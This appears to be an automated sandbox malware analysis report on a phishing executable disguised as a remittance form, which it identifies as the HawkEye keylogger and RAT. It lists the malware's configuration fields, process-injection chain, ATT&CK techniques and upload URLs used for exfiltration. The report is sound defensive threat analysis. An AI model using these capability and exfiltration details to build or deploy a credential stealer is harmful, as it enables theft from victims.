          Source: urdavsa.pif.1.drBinary or memory string: IDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
          Source: urdavsa.pif, urdavsa.pif, 00000019.00000002.585558648.0000000002480000.00000002.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.586038827.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: urdavsa.pif, 00000019.00000002.585558648.0000000002480000.00000002.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.586038827.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: urdavsa.pif, 00000002.00000003.386710610.0000000000B66000.00000004.00000001.sdmp, urdavsa.pif, 0000000A.00000003.399515071.00000000038A1000.00000004.00000001.sdmp, urdavsa.pif, 00000015.00000003.517916403.0000000001C45000.00000004.00000001.sdmp, urdavsa.pif, 00000019.00000003.526855030.00000000045C1000.00000004.00000001.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: rpgc.htg.1.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
          Source: urdavsa.pif, 00000019.00000002.585558648.0000000002480000.00000002.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.586038827.0000000001C10000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: urdavsa.pif, 00000019.00000002.585558648.0000000002480000.00000002.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.586038827.0000000001C10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: urdavsa.pif, 00000002.00000002.391973257.0000000000B12000.00000002.00020000.sdmp, urdavsa.pif, 0000000A.00000002.458737854.0000000000B12000.00000002.00020000.sdmp, urdavsa.pif, 00000015.00000000.457959788.0000000000B12000.00000002.00020000.sdmp, urdavsa.pif, 00000019.00000002.585114275.0000000000B12000.00000002.00020000.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript PausedblankinfoquestionstopwarningAutoIt -
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FE34B cpuid 1_2_009FE34B
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: GetLocaleInfoW,GetNumberFormatW,1_2_009F9D99
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009FCBB8 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,1_2_009FCBB8
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B02BF9 GetUserNameW,10_2_00B02BF9
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 2_2_00AAE284 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,2_2_00AAE284
          Source: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exeCode function: 1_2_009EA995 GetVersionExW,1_2_009EA995
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Yara detected MailPassViewShow sources
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7da834a.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4aedbda.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4aedbda.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95890.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7da834a.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95890.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95bd5.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50345.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000003.582261171.0000000004A95000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Yara detected WebBrowserPassView password recovery toolShow sources
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95bd5.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50345.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95890.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95890.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.3.RegSvcs.exe.4a95bd5.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.RegSvcs.exe.7d50345.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000003.582261171.0000000004A95000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Source: urdavsa.pifBinary or memory string: WIN_XP
          Source: urdavsa.pifBinary or memory string: WIN_XPe
          Source: urdavsa.pifBinary or memory string: WIN_VISTA
          Source: urdavsa.pif.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
          Source: urdavsa.pifBinary or memory string: WIN_7
          Source: urdavsa.pifBinary or memory string: WIN_8
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR

          Remote Access Functionality:

          barindex
          Detected HawkEye RatShow sources
          Source: urdavsa.pif, 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
          Source: RegSvcs.exe, 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
          Yara detected HawkEye KeyloggerShow sources
          Source: Yara matchFile source: 28.2.RegSvcs.exe.980000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: urdavsa.pif PID: 5552, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4684, type: MEMORYSTR
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AFC06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,10_2_00AFC06C
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00B065D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00B065D3
          Source: C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifCode function: 10_2_00AF4EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_00AF4EFB

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2Scripting11DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture31System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsNative API11Valid Accounts2DLL Side-Loading1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture31Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter2Logon Script (Windows)Valid Accounts2Scripting11Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Access Token Manipulation21Obfuscated Files or Information12NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptProcess Injection312Software Packing2LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery221VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading2DCSyncVirtualization/Sandbox Evasion2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion2/etc/passwd and /etc/shadowApplication Window Discovery11Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection312Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 465268 Sample: E-Remittance Form_z.TXT.exe Startdate: 14/08/2021 Architecture: WINDOWS Score: 100 41 Multi AV Scanner detection for domain / URL 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 12 other signatures 2->47 13 E-Remittance Form_z.TXT.exe 26 2->13         started        process3 file4 37 C:\Users\user\AppData\Local\...\urdavsa.pif, PE32 13->37 dropped 16 urdavsa.pif 3 3 13->16         started        process5 file6 35 C:\Users\user\AppData\Local\Temp\...\run.vbs, ASCII 16->35 dropped 39 Multi AV Scanner detection for dropped file 16->39 20 wscript.exe 1 16->20         started        signatures7 process8 process9 22 urdavsa.pif 20->22         started        process10 24 wscript.exe 1 22->24         started        process11 26 urdavsa.pif 24->26         started        process12 28 wscript.exe 1 26->28         started        process13 30 urdavsa.pif 28->30         started        signatures14 49 Writes to foreign memory regions 30->49 51 Allocates memory in foreign processes 30->51 53 Injects a PE file into a foreign processes 30->53 33 RegSvcs.exe 30->33         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif34%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pif46%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          28.2.RegSvcs.exe.980000.0.unpack100%AviraTR/Dropper.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://secure.globalsign.net/cacert/PrimObject.crt00%URL Reputationsafe
          http://secure.globalsign.net/cacert/ObjectSign.crt090%URL Reputationsafe
          https://a.pomf.cat/8%VirustotalBrowse
          https://a.pomf.cat/0%Avira URL Cloudsafe
          http://www.globalsign.net/repository090%URL Reputationsafe
          http://pomf.cat/upload.php&https://a.pomf.cat/0%Avira URL Cloudsafe
          http://pomf.cat/upload.php9%VirustotalBrowse
          http://pomf.cat/upload.php0%Avira URL Cloudsafe
          http://www.globalsign.net/repository/00%URL Reputationsafe
          http://www.globalsign.net/repository/030%URL Reputationsafe
          http://pomf.cat/upload.phpCContent-Disposition:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://secure.globalsign.net/cacert/PrimObject.crt0urdavsa.pif.1.drfalse
          • URL Reputation: safe
          		unknown
          http://secure.globalsign.net/cacert/ObjectSign.crt09urdavsa.pif.1.drfalse
          • URL Reputation: safe
          		unknown
          https://a.pomf.cat/RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmptrue
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.globalsign.net/repository09urdavsa.pif.1.drfalse
          • URL Reputation: safe
          		unknown
          http://pomf.cat/upload.php&https://a.pomf.cat/urdavsa.pif, 00000019.00000003.580526774.0000000004A10000.00000004.00000001.sdmp, RegSvcs.exe, 0000001C.00000002.584515573.0000000000982000.00000040.00000001.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://pomf.cat/upload.phpRegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmptrue
          • 9%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://www.nirsoft.net/RegSvcs.exe, 0000001C.00000002.589273699.0000000007D50000.00000004.00000001.sdmpfalse
            		high
            http://www.autoitscript.com/autoit3/0urdavsa.pif.1.drfalse
              		high
              http://www.globalsign.net/repository/0urdavsa.pif.1.drfalse
              • URL Reputation: safe
              		unknown
              http://bot.whatismyipaddress.com/RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmpfalse
                		high
                http://www.globalsign.net/repository/03urdavsa.pif.1.drfalse
                • URL Reputation: safe
                		unknown
                http://pomf.cat/upload.phpCContent-Disposition:RegSvcs.exe, 0000001C.00000002.586361746.0000000003234000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		unknown

                Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:33.0.0 White Diamond
                Analysis ID:465268
                Start date:14.08.2021
                Start time:10:47:11
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 29s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:E-Remittance Form_z.TXT.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:29
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@17/20@0/0
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 62.6% (good quality ratio 60%)
                • Quality average: 80%
                • Quality standard deviation: 26.9%
                HCA Information:
                • Successful, ratio: 60%
                • Number of executed functions: 193
                • Number of non-executed functions: 183
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:50:02API Interceptor1x Sleep call for process: RegSvcs.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                C:\Users\user\AppData\Local\Temp\82139548\urdavsa.pifNotice to submit_pdf.exeGet hashmaliciousBrowse
                  New Order No.0342.exeGet hashmaliciousBrowse
                    Notice_to_submit.exeGet hashmaliciousBrowse
                      Quote AUG_AQ601-LH7019B_Docx.exeGet hashmaliciousBrowse
                        AUG PO-HN512201811,PDF.exeGet hashmaliciousBrowse

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Temp\82139548\bsaecqbjx.docx
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):674
                          Entropy (8bit):5.540128598208296
                          Encrypted:false
                          SSDEEP:12:8jKFFAqcUJwSdPU02ikQtSG/pENAJzLRrR4bFy9TcOYXT0JNrBFDQ:8KSUJBT2/PG/pcoogT/+T0JZDQ
                          MD5:F0F53FE19A0F58EE77AA2A14F9C1C581
                          SHA1:5FD907307B9A05C993E4F1F03A0933977CE9FDAC
                          SHA-256:8DFE05B156401A48A206E21B86057AE05529F5F963EBCFFAB763D82B5C43C7E7
                          SHA-512:50F08CD830ADB394548D289FD115C0D2A919212009178A10358601B902132FB1D8F7E5D0025516451DF8B6138A974D5D5352AA570DDACC0F320FD030CE351F3D
                          Malicious:false
                          Reputation:low
                          Preview: 4vvVKXzLWk06W5qQ2558A8WcwXnYcYzmB79985jTku28tRMDd96crO1mj93JA40L5u835M4..2IRu51JrI8s7638J6SkQw2j24mr377Dn9L5392Q63204T2gR1hnWkoYn257Kq35uGM8izo19EL7O7d0DQ8wEaQ9e7..ll0ph3JAh8P3YJ6d0SWSVKw92TOfs12oX7mkPVzn384SEJ23G1fa7gllQ5UC673L07567McjZ7j6O05TR8..5G8U0d9Q0KYiY4mpWT75H330Ns5FE0646PwR97pI9w63lS202i4757B80L4T97Xy3300RQ4Vm388572IoXLuh1Q57..u43U227454Ld193n67JJA7ZrE1169185019g5jxrIrZ9563s3o5a9UMW1Y9Mm8X611JEn71xwymT58FY28ksb44vpV0j33P2KT6e140O218cN7F0h7pe0z25TA3537W56Ays..YEH7D19428y..z1uDG8fvRbX1337udm44s46A0u0ARZ0Z26R31O8U0mf3rko70635M58w1eIUc4k2724KJAn335N81A7bgM8Hd2403HwMw3e37zH6dgrjjhYn030DYq0319SRcnvqAe5Cf45J7n22T8h342Ix0J392V5W09674638h8sp2ZnY855lz9r579Kf9Y70b6..
                          C:\Users\user\AppData\Local\Temp\82139548\essmbjocut.ico
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):604
                          Entropy (8bit):5.52265483798474
                          Encrypted:false
                          SSDEEP:12:PGp6do4g1GWuiGzZTKiIoUfGfThmBtmxNrm+JUtgK27hu3Fn:PiDY7iGNKNbfm0BtiPJY0hu3F
                          MD5:26FD61702ABAB4B42FF87A064DBACBEA
                          SHA1:99F80E74E2A16A5AEC6A7310C42AD7777D44DE17
                          SHA-256:543AECFFBDE74DEC8E0D568AB649AAC80E9F42E464395C742D3778D7159173D1
                          SHA-512:8A6D42867C425B4BAE7CEA35A8772546BA0823744F90A5D2689CBF356C990BAD2099C5FB10342580FB423D0F2179723FBB54A7DC9F42D5017508F3AB1FE6FB9B
                          Malicious:false
                          Reputation:low
                          Preview: 16438L861u45VT60..Ppq3s1Dov26S0P26R3W48YX9V8k10s61fYFwHSz8o27k11L2SmftWB70XN2795470JClr8M5pdj07Ry89J3v0TIr8Qp01D63Q..st7k581q40X0u6396Yf9v48X4P3nc1t7BgT0n5q5Kz6jQ8s9u5P4QY69j4B1322x6k66n3R2j3I6l920xIch951jm17Oj9..7F541mfJuu61BnZM19u5oAG1u3KA4UMGS5L3ka6Y217722zp2iojdTKM56nURfA24680XW29F479v7Z5353d5s7b92vl2R5FbU0tLwQ5m99Ft1I23201T7876G495Q819H1W808033Zxy46x004jch873..yV4kxkYvlo58oZcS1oeB94M5838N8y76C4R1z1AOG5Tk5pFQM64V1ELy9y1zbL908QXfU598VGO326NRDAzfZGL0zr..848O6C9vfu67VYPVu8J75oE0967FC6o960R755bs9rk16nh02W5i62Yi592k60t701NKN1I5GA9211630PGi74M198523hU20Oa1KsbC9N17tw7ogM3i3bIW940a38c042XyEn4CI75LIn..
                          C:\Users\user\AppData\Local\Temp\82139548\hqlxwejnc.exe
                          Process:C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):598
                          Entropy (8bit):5.4952567631528115
                          Encrypted:false
                          SSDEEP:12:xKxMdia+ETKV5SpyJHWwEVflx5vD/Q1aEb9OLToZui4OJ9bum7a4JOfAUn:4a+EeVMpPLflrQ11xOHA4gRumuqhU
                          MD5:358136509F7C05C793B42E886AE6D084
                          SHA1:992D2F72C85F9E9745242F6FDCDE071973D224E2
                          SHA-256:40B4D24B4FA108163B4D24BAF7CAE02CAFFF9DE0AD75BE9A481006E8ECDB76AB
                          SHA-512:65BE9C4A58FD2B57309F3F8D5C1596BA77D00227868B376ED5608B2925B4BE9D7DB38812869F073A9FD0F8366AC21E03FE3EDF7D57E305C1D867E0F6D47EC568
                          Malicious:false
                          Reputation:low
